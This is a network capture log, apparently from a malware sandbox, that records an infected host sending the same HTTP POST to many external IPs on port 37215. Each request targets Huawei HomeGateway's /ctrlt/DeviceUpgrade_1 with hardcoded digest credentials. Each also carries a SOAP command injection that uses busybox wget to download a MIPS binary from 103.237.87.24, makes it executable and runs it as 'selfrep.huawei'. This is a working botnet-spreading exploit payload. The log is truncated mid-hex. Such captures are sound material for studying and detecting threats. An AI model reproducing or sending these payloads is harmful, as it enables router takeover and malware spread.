                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192.168.2.135275241.25.79.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055378914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192.168.2.1358302197.125.79.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055404902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.1346880197.52.189.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055430889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192.168.2.1354592182.234.213.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055432081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.1349278197.58.200.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055457115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192.168.2.1358718157.13.197.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055470943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.1341948197.96.90.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055507898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.1348268157.235.71.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055507898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192.168.2.1342614157.89.87.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055510044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192.168.2.1360340197.152.81.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.055510044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 